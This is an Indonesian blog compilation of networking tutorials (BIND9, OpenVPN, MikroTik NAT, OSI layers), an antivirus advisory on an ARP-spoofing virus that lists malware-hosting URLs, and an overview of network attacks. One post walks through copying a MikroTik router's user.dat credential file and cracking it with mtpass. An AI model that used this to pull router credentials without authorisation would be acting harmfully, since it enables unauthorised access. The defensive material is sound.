godong sawi gawe jangan, klopo gawe santen
menawi ono kekurangan, monggo di beneraken

bissmillah…

1. install bind9

# apt-get install bind9

2. setelah selesai install bind9 kemudian masuk ke di rektori /etc/bind dan copy file yang dibutuhkan yaitu…

# cd /etc/bind/
# cp db.127 /var/cache/bind/db.10
# cp db.local /var/cache/bind/db.banksonk

3. kemudian edit file named.conf.local, dan tambahkan baris seperti berikut :

//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "kukukaki.net" {
        type master;
                file "/var/cache/bind/db.banksonk";
};
zone "12.252.10.in-addr.arpa"{
        type master;
                file "/var/cache/bind/db.10";
};

4. kemudian edit file /var/cache/bind/db.10

# cd /var/cache/bind/
# nano db.10

isikan baris seperti berikut :

;
; BIND reverse data file for local loopback interface
;
$TTL    604800
@       IN      SOA     www.kukukaki.net. root.kukukaki.net. (
                              1         ; Serial
                         604800         ; Refresh
                          86400         ; Retry
                        2419200         ; Expire
                         604800 )       ; Negative Cache TTL
;
@       IN      NS      localhost.
254     IN      PTR     www.kukukaki.net.
254     IN      PTR     newfs.kukukaki.net
254     IN      PTR     mirror.kukukaki.net

5. kemudian file db.banksonk

;
; BIND data file for local loopback interface
;
$TTL    604800
@       IN      SOA     www.kukukaki.net. root.kukukaki.net. (
                              2         ; Serial
                         604800         ; Refresh
                          86400         ; Retry
                        2419200         ; Expire
                         604800 )       ; Negative Cache TTL
;
@               IN      NS      localhost.
@               IN      A       127.0.0.1
www             IN      A       10.252.12.254
newfs	        IN      A       10.252.12.254
mirror          IN      A       10.252.12.254

6. kemudian edit file /etc/resolv.conf dan tambahkan nameserver ip localhost…

# nano /etc/resolv.conf

isi seperti berikut :

search kukukaki.net
nameserver 10.252.12.254
nameserver 202.134.0.155
nameserver 202.134.1.10

7. setelah itu restart service bind9 dengan perintah…

# /etc/init.d/bind9 restart

8. untuk checkinnya lakukan dengan perintah

# nslookup www.kukukaki.net

hasilnya :

# nslookup www.kukukaki.net
Server:         10.252.12.254
Address:        10.252.12.254#53

Name:   www.kukukaki.net
Address: 10.252.12.254

atau dengan

nslookup 10.252.12.254

hasilnya :

# nslookup 10.252.12.254
Server:         10.252.12.254
Address:        10.252.12.254#53

254.12.252.10.in-addr.arpa      name = mirror.kukukaki.net.12.252.10.in-addr.arpa.
254.12.252.10.in-addr.arpa      name = newfs.kukukaki.net.12.252.10.in-addr.arpa.
254.12.252.10.in-addr.arpa      name = www.kukukaki.net.

hihihi… success dns server done.

nb :

» A record atau catatan alamat memetakan sebuah nama host ke alamat IP 32-bit (untuk IPv4).
» AAAA record atau catatan alamat IPv6 memetakan sebuah nama host ke alamat IP 128-bit (untuk IPv6).
» CNAME record atau catatan nama kanonik membuat alias untuk nama domain. Domain yang di-alias-kan memiliki seluruh subdomain dan rekod DNS seperti aslinya.
» MX record atau catatan pertukaran surat memetakan sebuah nama domain ke dalam daftar mail exchange server untuk domain tersebut.
» PTR record atau catatan penunjuk memetakan sebuah nama host ke nama kanonik untuk host tersebut. Pembuatan rekod PTR untuk sebuah nama host di dalam domain in-addr.arpa yang mewakili sebuah alamat IP menerapkan pencarian balik DNS (reverse DNS lookup) untuk alamat tersebut. Contohnya www.icann.net memiliki alamat IP 192.0.34.164, tetapi sebuah rekod PTR memetakan ,,164.34.0.192.in-addr.arpa ke nama kanoniknya: referrals.icann.org.
» NS record atau catatan server nama memetakan sebuah nama domain ke dalam satu daftar dari server DNS untuk domain tersebut. Pewakilan bergantung kepada rekod NS.
» SOA record atau catatan otoritas awal (Start of Authority) mengacu server DNS yang mengediakan otorisasi informasi tentang sebuah domain Internet.

thank`s
banksonk

cd /usr/src/
wget http://www.magnet-id.com/download/etc/openvpn/openvpn-2.0.9.tar.gz
wget http://www.magnet-id.com/download/etc/openvpn/lzo-1.08-4.rf.src.rpm

Instal paket yang dibutuhkan dengan menggunakan Yum Package Managemen:

yum install rpm-build autoconf.noarch zlib-devel pam-devel openssl-devel

Dalam contoh ini kita akan membuat sendiri paket RPM yang akan kita install dari source file yang disediakan;

rpmbuild –rebuild lzo-1.08-4.rf.src.rpm
rpm -Uvh /usr/src/redhat/RPMS/i386/lzo-*.rpm
rpmbuild -tb openvpn-2.0.9.tar.gz

Install OpenVPN menggunakan RPM yang sudah kita buat sebelumnya;

rpm -Uvh /usr/src/redhat/RPMS/i386/openvpn-2.0.9-1.i386.rpm

Kopi file configurasi dan script easy-rsa yang dibutuhkan untuk membuat SSL certificate dan key baik untuk server maupun untuk klien nantinya;

cp -r /usr/share/doc/openvpn-2.0.9/easy-rsa/ /etc/openvpn/
cp /usr/share/doc/openvpn-2.0.9/sample-config-files/server.conf /etc/openvpn/

Membuat Certificate dan Key untuk Server

cd /etc/openvpn/easy-rsa/

Edit variabel di dalam vars untuk memudahkan kita dalam proses pembuatan SSL certificate;

nano vars

Sesuaikan entry berikut (dibagian paling bawah);

export KEY_COUNTRY=ID
export KEY_PROVINCE="JATIM"
export KEY_CITY="BLAMBANGAN"
export KEY_ORG=”bento.inc”
export KEY_EMAIL=”me@kukukakikukakukaku.com”

Jalankan perintah berikut;

. ./vars #Perhatikan, .(spasi).vars
./clean-all #Akan mengosongkan direktori keys/

Generate SSL Certificate, semua certificate dan key akan berada di dalam direktori /etc/openvpn/easy-rsa/keys;

./build-ca

Kemudian kita akan membuat server key, sesuaikan ovpnserver dengan keinginan kita, juga cukup tekan enter untuk variabel yang sudah kita tentukan sebelumnya:

./build-key-server ovpnserver

Generate Diffie Hellman:

./build-dh

Tunggu sampai proses selesai, file certificate dan key kemudian kita kopi ke /etc/openvpn dimana file server.conf akan ditempatkan, path untuk key dan certificate tersebut nantinya harus disesuaikan dengan informasi yang kita masukkan di file konfigurasi:

cp keys/ca.crt ../
cp keys/dh1024.pem ../
cp keys/ovpnserver.key ../
cp keys/ovpnserver.crt ../

Edit file /etc/openvpn/server.conf sesuai dengan keinginan kita, sebagai permulaan silahkan lakukan perubahan pada baris-baris berikut; Sesuaikan konfigurasi push route, push route akan membuat table routing untuk klien yang terkoneksi dengan OpenVPN Server, dalam contoh ini kita ingin agar klien kita menambah routing untuk blok 10.10.10.0/24 ke IP Gateway OpenVPN Server.

local ip.address.listen.server # Tidak perlu dimasukkan kecuali hanya ingin listen di satu IP (Optional)

dev tap
;dev tun
ca ca.crt
cert ovpnserver.crt
key ovpnserver.key
server 10.10.11.0 255.255.255.0
push “route 10.10.10.0 255.255.255.0?

Konfigurasi blok IP Address pada direktif server akan menentukan blok IP Address di interface tap yang muncul kita OpenVPN Server dijalankan, dan muncul di sisi klien ketika terkoneksi.

startup

service openvpn start
chkconfig openvpn on

dan jangan lupa untuk routingnya:

iptables -t nat -A POSTROUTING -s 10.10.10.0/24 -o venet0 -j SNAT --to -ip lokal server-
/etc/init.d/iptables save #untuk save routing/iptables

refrensi :

- http://artikel.magnet-id.com/aplikasi-linux/instalasi-openvpn-server-di-centos-52-64-bit/

iseng² mainan NAT di mikrotik hihihi… pengennya sih redirect percobaan awal pake web server sajo, lainnya tinggal kreativitas panjenengan sedoyo…

huyee… langsung sajooo…

1. install webserver di PC yang posisinya berada dibawah router (bisa pake apache2, wampp, xampp dll).
2. kemudian buka mikrotik setting seperti berikut :
/ip firewall nat chain=dstnat dst-address= protocol=tcp dst-port= action=dst-nat to-addresses= to-ports=

contoh :
/ip firewall nat chain=dstnat dst-address=10.252.123.34 protocol=tcp dst-port=69 action=dst-nat to-addresses=172.1.1.15 to-ports=80

3. selesai… web server dibelakang router mikrotik bisa di nikmati dengan mengakeses http://10.252.123.34:69/

nb : ingat dibelakang ip publik harus disertakan port tujuannya kalau tidak akan otomatis mengarah ke port 80 milik router…

thank`s
banksonk

1. booting PC router pake cd linux live CD kayak ubuntu ato apalah yg laennya (ane sih ake ubuntu)
2. kalo uda masuk dekstopnya kemudian copy file user.dat letaknya di /nova/store/user.dat (copy pake flashdisk ato apalah terserah). trus reboot dan masuk mikocok lagi...
3. pindah ke PC yang ada OS linuxnya (distro terserah asal uda di install pakage g++, ane pake debian lenny).
4. extrak dulu file mtpass v0.5 pake perintah tar -xvjf namafile
5. masuk ke direktory hasil extrak trus compile file mtpass.cpp dengan perintah g++ -lssl -lcrypto mtpass.cpp -o mtpass(nama file hasil compile)
6. hasilnya ada file baru yaitu mtpass, trus copy file user.dat dalam folder tempat mtpass(nama file hasil compile)
7. finishing jalankan dengan perintah ./mtpass user.dat
8. contoh hasilnya ada disini

**yang mau mtpass v0.5 ada disini

selamad mencoba kawand…..

thank`s
banksonk

Model Open Systems Interconnection (OSI) diciptakan oleh International Organization for Standardization (ISO) yang menyediakan kerangka logika terstruktur bagaimana proses komunikasi data berinteraksi melalui jaringan. Standard ini dikembangkan untuk industri komputer agar komputer dapat berkomunikasi pada jaringan yang berbeda secara efisien.

Model Layer OSI

Terdapat 7 layer pada model OSI. Setiap layer bertanggungjawwab secara khusus pada proses komunikasi data. Misal, satu layer bertanggungjawab untuk membentuk koneksi antar perangkat, sementara layer lainnya bertanggungjawab untuk mengoreksi terjadinya “error” selama proses transfer data berlangsung.
Model Layer OSI dibagi dalam dua group: “upper layer” dan “lower layer”. “Upper layer” fokus pada applikasi pengguna dan bagaimana file direpresentasikan di komputer. Untuk Network Engineer, bagian utama yang menjadi perhatiannya adalah pada “lower layer”. Lower layer adalah intisari komunikasi data melalui jaringan aktual.

“Open” dalam OSI adalah untuk menyatakan model jaringan yang melakukan interkoneksi tanpa memandang perangkat keras/ “hardware” yang digunakan, sepanjang software komunikasi sesuai dengan standard. Hal ini secara tidak langsung menimbulkan “modularity” (dapat dibongkar pasang).

Modularity
“Modularity” mengacu pada pertukaran protokol di level tertentu tanpa mempengaruhi atau merusak hubungan atau fungsi dari level lainnya.
Dalam sebuah layer, protokol saling dipertukarkan, dan memungkinkan komunikasi terus berlangsung. Pertukaran ini berlangsung didasarkan pada perangkat keras “hardware” dari vendor yang berbeda dan bermacam-macam alasan atau keinginan yang berbeda.

Modularity
Seperti contoh Jasa Antar/Kurir. “Modularity” pada level transportasi menyatakan bahwa tidak penting, bagaimana cara paket sampai ke pesawat.
Paket untuk sampai di pesawat, dapat dikirim melalui truk atau kapal. Masing-masing cara tersebut, pengirim tetap mengirimkan dan berharap paket tersebut sampai di Toronto. Pesawat terbang membawa paket ke Toronto tanpa memperhatikan bagaimana paket tersebut sampai di pesawat itu.

7 Layer OSI

Model OSI terdiri dari 7 layer :
* Application
* Presentation
* Session
* Transport
* Network
* Data Link
* Physical

Apa yang dilakukan oleh 7 layer OSI ?

Ketika data ditransfer melalui jaringan, sebelumnya data tersebut harus melewati ke-tujuh layer dari satu terminal, mulai dari layer aplikasi sampai physical layer, kemudian di sisi penerima, data tersebut melewati layer physical sampai aplikasi. Pada saat data melewati satu layer dari sisi pengirim, maka akan ditambahkan satu “header” sedangkan pada sisi penerima “header” dicopot sesuai dengan layernya.

Model OSI

Tujuan utama penggunaan model OSI adalah untuk membantu desainer jaringan memahami fungsi dari tiap-tiap layer yang berhubungan dengan aliran komunikasi data. Termasuk jenis-jenis protoklol jaringan dan metode transmisi.

Model dibagi menjadi 7 layer, dengan karakteristik dan fungsinya masing-masing. Tiap layer harus dapat berkomunikasi dengan layer di atasnya maupun dibawahnya secara langsung melalui serentetan protokol dan standard.

Model OSI	Keterangan
	Application Layer: Menyediakan jasa untuk aplikasi pengguna. Layer ini bertanggungjawab atas pertukaran informasi antara program komputer, seperti program e-mail, dan service lain yang jalan di jaringan, seperti server printer atau aplikasi komputer lainnya.
	Presentation Layer: Bertanggung jawab bagaimana data dikonversi dan diformat untuk transfer data. Contoh konversi format text ASCII untuk dokumen, .gif dan JPG untuk gambar. Layer ini membentuk kode konversi, translasi data, enkripsi dan konversi.
	Session Layer: Menentukan bagaimana dua terminal menjaga, memelihara dan mengatur koneksi,- bagaimana mereka saling berhubungan satu sama lain. Koneksi di layer ini disebut “session”.
	Transport Layer: Bertanggung jawab membagi data menjadi segmen, menjaga koneksi logika “end-to-end” antar terminal, dan menyediakan penanganan error (error handling).
	Network Layer: Bertanggung jawab menentukan alamat jaringan, menentukan rute yang harus diambil selama perjalanan, dan menjaga antrian trafik di jaringan. Data pada layer ini berbentuk paket.
	Data Link Layer: Menyediakan link untuk data, memaketkannya menjadi frame yang berhubungan dengan “hardware” kemudian diangkut melalui media. komunikasinya dengan kartu jaringan, mengatur komunikasi layer physical antara sistem koneksi dan penanganan error.
	Physical Layer: Bertanggung jawab atas proses data menjadi bit dan mentransfernya melalui media, seperti kabel, dan menjaga koneksi fisik antar sistem.

source : http://mudji.net

emoticon adalah sebuah icon berupa gambar still atau gerak yang menggambarkan suasana hati. Emoticon juga kadang disebut smiley, emote, dan lain-lain. Contoh yang paling sering digunakan yaitu smiley/emoticon yang dipake saat chatting pakai messenger seperti Yahoo!Messenger, MSN, dll.

Emoticon juga ada pada fitur chat yang ada pada facebook. Apabila kita mengetikkan suatu teks tertentu, maka emoticon yang sesuai akan muncul.

Nah, bingung kan teks apa yang harus ditulis supaya emoticonnya keluar. Cukup ketikkan salah satu teks dibawah gambar yang ingin ditampilkan.

Berikut daftar emoticon chat facebook :

Image	Coding	Image	Coding
	:-P :P :-p :p =P		:-) :) :] =)
	:-D :D =D		:-( :( :[ =(
	:-O :O :-o :o		3:) 3:-)
	;-) ;)		O:) O:-)
	8-) 8) B-) B)		:-* :*
	8-| 8| B-| B|		<3
	>:( >:-(		^_^
	:/ :-/ :\ :-\		-_-
	>:O >:-O >:o >:-o		:v
	:3		:|]
	:putnam:		(^^^)
	:'(		o.O O.o

salam hangat
banksonk

2. nah kemudian akan muncul jendela map network drive kemudian disana isikan sebagai berikut :

Drive » ini nantinya menentukan folder sharing diganti menjadi virtual drive (a,c,d,e…z)
Folder » ini adalah source/asal dari folder yang di share pada komputer lain, untuk itu cukup isi dengan \\\

contoh : \\172.10.10.14\film

3. setelah itu klik finish

maka akan muncul virtual directory secara otomatis pada explorer, dan itulah folder share dari komputer lain tadi.

nb : agar virtual drive bisa diakses disarankan PC yang share data harus dalam keadaan hidup.

salam hangat
banksonk

Mengapa penyakit Demam Berdarah sangat ditakuti dan setiap tahun selalu memakan korban jiwa ? Sebenarnya jika penderita Demam Berdarah dapat mendeteksi bahwa dia di serang oleh kuman dengue, kemungkinan yang fatal akan jauh lebih kecil dan dapat di hindari. Tetapi yang menjadi masalah adalah gejala-gejala awal DB ini pada awalnya sulit dibedakan dari demam biasa dan hanya dapat dipastikan dengan pemeriksaan darah di laboratorium beberapa hari sesudah demam.
Hal yang serupa saat ini sedang terjadi di jaringan intranet Indonesia. Saat ini, ada satu virus impor dari Cina yang memiliki kemampuan memalsukan MAC Address router / proxy sehingga seluruh komputer intranet yang terhubung ke internet melalui proxy akan dikelabui untuk melewati komputer yang terinfeksi virus dan celakanya komputer yang terinfeksi virus ini akan meneruskan akses router ini (transparent proxy) sambil “menitipkan” satu link download yang berisi virus. Praktis pengakses internet dalam jaringan akan mendapatkan kiriman virus setiap kali membuka browser. Karena yang “dikerjai” adalah router, maka link berisi virus ini tidak akan pandang bulu dikirimkan ke seluruh komputer dalam jaringan, tidak perduli apa merek browser yang dipakai, baik IE, Firefox atau Safari sekalipun tetap mendapatkan kiriman virus. Menurut pengetesan Vaksincom, selain Windows XP yang menjadi sasaran tembak virus, ternyata OS Windows Vista dan Linux sekalipun akan tetap mendapatkan kiriman virus ini setiap kali melakukan browsing. Hanya saja virus yang dikirim saat ini bisa berjalan di platform Windows XP. Tetapi setidaknya hal ini menunjukkan proof of concept bahwa secara teknis platform apapun dapat dicapai oleh virus.
Kembali ke analogi Demam Berdarah di atas, menurut pengamatan Vaksincom korban virus ini cukup banyak, khususnya menyerang jaringan intranet yang tidak terlindung oleh antivirus dengan “sempurna”**. Dan kebanyakan korbannya tidak menyadari. Biasanya korban mulai menyadari kalau masalahnya sudah cukup besar seperti tahu-tahu jaringannya jadi lambat dan setiap kali menyalakan komputer dimana komputer akan otomatis mengaktifkan Yahoo Messenger, MSN Messenger atau aplikasi apapun yang mengaktifkan Javascript browser maka akan mendapatkan pesan error.

**
Yang dimaksudkan dengan perlindungan antivirus yang sempurna adalah SEMUA komputer dalam jaringan (khususnya Windows XP) sudah terlindung dengan antivirus yang terupdate. Disini dikatakan semua karena virus ini hanya membutuhkan satu saja komputer di dalam jaringan intranet terinfeksi virus ini dan dalam waktu singkat ia akan mengambil alih Gateway internet dan menyebarkan dirinya ke seluruh komputer dalam jaringan intranet (dengan catatan jaringan / switch belum dilengkapi dengan perlindungan anti ARP Spoofing atau lebih dikenal dengan nama DHCP Snooping).

Gejala jaringan terinfeksi virus
Jika koneksi internet di kantor anda tahu-tahu mengalami kelambatan yang signifikan padahal koneksi internet dari ISP tidak ada masalah di tambah komputer dalam jaringan “berulang-ulang” mendapatkan insiden virus atau ketika menjalankan Yahoo Messenger anda mendapatkan pesan “An error has occured in the script on this page”. Jika anda menggunakan Norman Virus Control setiap kali menjalankan Yahoo Messenger / MSN Messenger atau menjalankan browser terdeteksi virus dengan nama W32/Agent.FUVR. Atau di sistem Windows anda ada file dengan nama Microsoft.vbs, Microsoft.bat atau Microsoft.pif maka kemungkinan besar komputer anda / jaringan ada yang terinfeksi virus Agent.FUVR. Lihat artikel virus ini di situs vaksin.com.
Aksi virus ini pada beberapa OS adalah sebagai berikut :
• Windows XP tanpa antivirus / antivirus tidak terupdate.
Tidak ada gejala apa-apa dan dapat langsung terinfeksi, sekaligus PC yang terinfeksi akan menjadi host virus di dalam jaringan yang kemudian akan memalsukan MAC Address Gateway.
• Windows XP dengan antivirus terupdate dan mampu mendeteksi virus ini.
“Setiap kali” menjalankan aplikasi yang mengakses fitur browser seperti menjalankan Internet Explorer, Firefox, login Yahoo Messenger, login MSN Messenger akan mendapatkan pesan bahwa ada virus terdeteksi di sistem Windows.
• Windows Vista
“Setiap kali” menjalankan aplikasi yang mengakses fitur browser seperti menjalankan Internet Explorer, Firefox, login Yahoo Messenger, login MSN Messenger akan mendapatkan pesan download error script dari site :
• http://root.51113.com/root.gif
• http://hk.www404.cn:53/ads.js
• http://err.www404.cn:443/014.html

Catatan : Website di atas hanya beberapa yang teridentifikasi oleh Vaksincom dan tidak tertutup kemungkinan untuk berubah / bertambah.
Tampilan website terinfeksi virus sulit dibedakan
Anda tidak akan dapat membedakan tampilan website yang yang sudah di injeksi oleh script yang mengirimkan virus ini karena pada banyak kasus tampilannya sama saja dengan website tidak asli.
Baru jika anda melakukan View Source dengan mengklik [View] [Page Source] atau Ctrl U dari Firefox (dari IE anda dapat melakukan View Source dengan cara klik [View] [Source]). Baru akan terlihat bahwa di awal website ternyata ada javascript yang mengarahkan download script dengan nama “ads.js” (lihat gambar 2) yang akan langsung terinstal secara otomatis setiap kali anda mengaktifkan browser atau menjalankan Yahoo Messenger (karena Yahoo Messenger mengaktifkan browser).
Antivirus saja tidak cukup !!
Sebenarnya hampir semua antivirus sudah dapat mendeteksi virus ini. Ada yang mendeteksi sebagai W32/Agent.FUVR (Norman), Trojan Downloader, Trojan-Downloader.JS.Agent.byh (Kaspersky), HEUR/Exploit.HTML (Avira), Mal/ObfJS-X (Sophos), JS_PSYME.CPZ (Trend Micro). Jadi secara teori, virus ini tidak dapat menginfeksi komputer yang terlindung antivirus yang terupdate. Tetapi masalahnya adalah dalam kenyataannya di lapangan sangat sulit “menjamin” seluruh komputer di jaringan terlindung dengan antivirus yang terupdate, apalagi jika ada komputer / notebook dari luar jaringan yang dihubungkan ke jaringan intranet, cukup satu saja komputer yang terinfeksi maka dalam waktu singkat ia akan memalsukan diri sebagai router / geteway dan menyebarkan dirinya ke seluruh komputer lain dalam intranet yang mengakses internet.
Selain itu, virus ini memiliki kemampuan mengupdate dirinya sehingga deteksi antivirus akan menjadi percuma jika pembuatnya meluncurkan varian baru dan dijamin langsung akan menaklukkan semua antivirus sampai vendor antivirus mendapatkan samplenya dan mendeteksi virus tersebut dengan update terbaru.

Masalah mendasar adalah sebenarnya patching. Selama celah kemanan tidak ditutup, maka sekalipun ada antivirus yang melindungi komputer, virus ini tetap akan mampu wara-wiri di dalam jaringan sampai celah keamanan di tutup. Yang menjadi pertanyaan adalah bagaimana menutup celah keamanan yang disebabkan oleh hardware yang mengandung kelemahan ARP Spoofing ini ? Salah satu caranya adalah mengganti switch dengan yang mendukung DHCP Snoop. Sebenarnya ada cara lain yang cukup hemat biaya yaitu dengan menggunakan perintah “arp -s” dari DOS Prompt guna mengunci IP dan Mac Address gateway di tiap PC, tetapi kalau PCnya ribuan dan tersebar di banyak lokasi rasanya solusi ini cukup membawa sengsara bagi administrator. Belum lagi kalau terjadi perubahan IP / Mac Address gateway, jadi perintah “arp -s” tersebut harus dilakukan di setiap PC lagi.

Bagaimana cara mengatasinya ?
Jika anda terinfeksi oleh virus ini dan pusing karena setiap kali dibersihkan kok virusnya kembali lagi. Percayalah, bukan anda saja yang pusing dan para administrator lain juga pusing. Langkah pertama yang harus anda lakukan setiap kali menghadapi masalah yang memusingkan adalah … NGELAMUN dulu. Mohon maaf, kami tidak bermaksud membuat anda di pecat, tetapi jika anda langsung sibuk membersihkan virus di setiap komputer dan belum mendapatkan gambaran masalah sebenarnya dimana, maka yang akan anda alami adalah virusnya kembali lagi dan memboroskan waktu anda. Dengan melamun anda jadi dapat melakukan analisa dengan tenang dan kepala dingin mengumpulkan data kira-kira apa sih yang terjadi. Jika anda pelanggan korporat Vaksincom, biarkan teknisi kami yang melamun dan memecahkan masalah anda …. GRATIS.
Kami juga mengalami hal yang serupa dan setelah “melamun” dua hari baru berhasil mengidentifikasi masalah dengan cukup jelas dimana virus ini mengeksploitasi ARP vulnerability dengan memalsukan Mac Address Gateway / Router. Jadi langkah pertama adalah menemukan gateway palsu tersebut. Bagaimana caranya ?
Anda dapat menggunakan tools gratisan Colasoft Mac Scanner http://www.colasoft.com/mac_scanner/mac_scanner.php dan jalankan di komputer yang terhubung ke jaringan intranet anda. Lalu lihat IP yang memiliki Mac Address yang sama dengan Gateway / proxy (lihat gambar 4)
Dalam gambar 4 di atas, Gateway adalah IP 192.168.1.1 dengan MAC Address 00:01:6C:CD:D5:24. Terlihat bahwa IP 192.168.1.106 memiliki MAC Address yang sama dengan Gateway. Jadi langkah pertama yang harus anda lakukan adalah memutuskan hubungan 192.168.1.106 dari jaringan dan membersihkan dari virus ini.
Langkah pamungkas
Sebagai langkah pamungkas, anda dapat mencegah komputer-komputer di jaringan untuk dibodohi oleh ARP Spoofing ini. Gunakan perintah “arp -s [IP Gateway / Proxy] [MAC Address Gateway / Proxy]” untuk menetapkan static IP dan MAC Address Gateway / Proxy di setiap komputer.
Jika anda memiliki banyak komputer dalam jaringan, kami sarankan untuk mempertimbangkan menggunakan switch yang mensupport DHCP Snoop. Jangan langsung beli dulu, cek dulu apakah switch yang anda miliki memiliki fitur ini. Kalau ada, langsung aktifkan dan set paremeter dengan baik guna terhindar dari ARP Spoofing.

Jika anda tertarik untuk mengetahui lebih jauh tentang ARP Spoofing, ancaman-ancamannya dan bagaimana cara menghadapinya. Nantikan seminar yang akan diadakan oleh PT. Vaksincom pada tanggal 10 Juli 2008 hasil kerjasama antara Trisakti School of Management, Cisco Indonesia dan Vaksincom. Seminar ini akan dibawakan oleh Alberto Rivai – Security Engineer Cisco Indonesia, Alfons Tanujaya – Antivirus Specialist, Dani Firmansyah – ARP Spoofing Expert.

source : http://vaksin.com

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker. protokol yang menangani komunikasi antar komputer kebanyakan berhasil di spoof. ICMP (Internet Control Message Protocol) adalah salah satunya(vulnerable) karena protokol ini dilewati oleh informasi dan pesan-pesan kesalahan diantara dua node dalam network. Internet Group Message Protocol(IGMP) dapat dieksploitasi dengan menggunakan serangan tipe ini karena IGMP melaporkan kondisi kesalahan pada level user datagram, selain itu juga protokol ini mengandung Informasi routing dan Informasi Network. (UDP) User Datagram Protocol juga dapat ‘diminta’ untuk menampilkan identitas host sasaran. Solusi untuk mencegah IP spoofing adalah dengan cara mengamankan packet-packet yang ditransmisikan dan memasang screening policies. Enkripsi Point-to-point juga dapat mencegah user yang tidak mempunyai hak untuk membaca data/packet. Autentikasi dapat juga digunakan untuk menyaring source yang legal dan bukan source yang sudah di spoof oleh attacker. Dalam pencegahan yang lain, Admininistrator dapat menggunakan signature untuk paket-paket yang berkomunikasi dalam networknya sehingga meyakinkan bahwa paket tersebut tidak diubah dalam perjalanan. Anti Spoofing rules(peraturan anti spoof) yang pada dasarnya memberitahukan server untuk menolak packet yang datangnya dari luar yang terlihat datangnya dari dalam, umumnya hal ini akan mematahkan setiap serangan spoofing.

2. FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.
Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.

3. Unix Finger Exploits

Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

4. Flooding & Broadcasting

Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan. Attacker sering kali menggunakan serangan flooding ini untuk mendapatkan akses ke system yang digunakan untuk menyerang network lainnya dalam satu serangan yang dinamakan Distributed Denial Of Service(DDOS). Serangan ini seringkali dipanggil smurf jika dikirim melaluli ICMP dan disebut fraggles ketika serangan ini dijalakan melewati UDP.
Suatu node (dijadikan tools) yang menguatkan broadcast traffic sering disebut sebagai Smurf Amplifiers, tools ini sangat efektif untuk menjalankan serangan flooding. Dengan melakukan spoofing terhadap network sasaran, seorang attacker dapat mengirim sebuah request ke smurf amplifier, Network yang di amplifiying(dikuatkan) akan mengirim respon kesetiap host di dalam network itu sendiri, yang berarti satu request yang dilakukan oleh attacker akan menghasilkan pekerjaan yang sama dan berulang-ulang pada network sasaran, hasil dari serangan ini adalah sebuah denial of service yang tidak meninggalkan jejak. Serangan ini dapat diantisipasi dengan cara menolak broadcast yang diarahkan pada router. TCP-level Flooding (kebanyakan SYN ATTACK) telah digunakan pada bulan februari tahun 2000 untuk menyerang Yahoo!, eBay dll yang menggunakan serangan DDOS(Distributed Denial Of Service). Network yang tidak menggunakan firewall untuk pengecekan paket-paket TCP biasanya bisa diserang dengan cara ini. Beberapa fungsi penyaringan pada firewall (Firewall Filtering Function) biasanya akan mampu untuk menahan satu serangan flooding dari sebuah alamat IP, tetapi serangan yang dilakukan melalui DDOS akan sulit di cegah karena serangan ini seperti kita ketahui datangnya dari 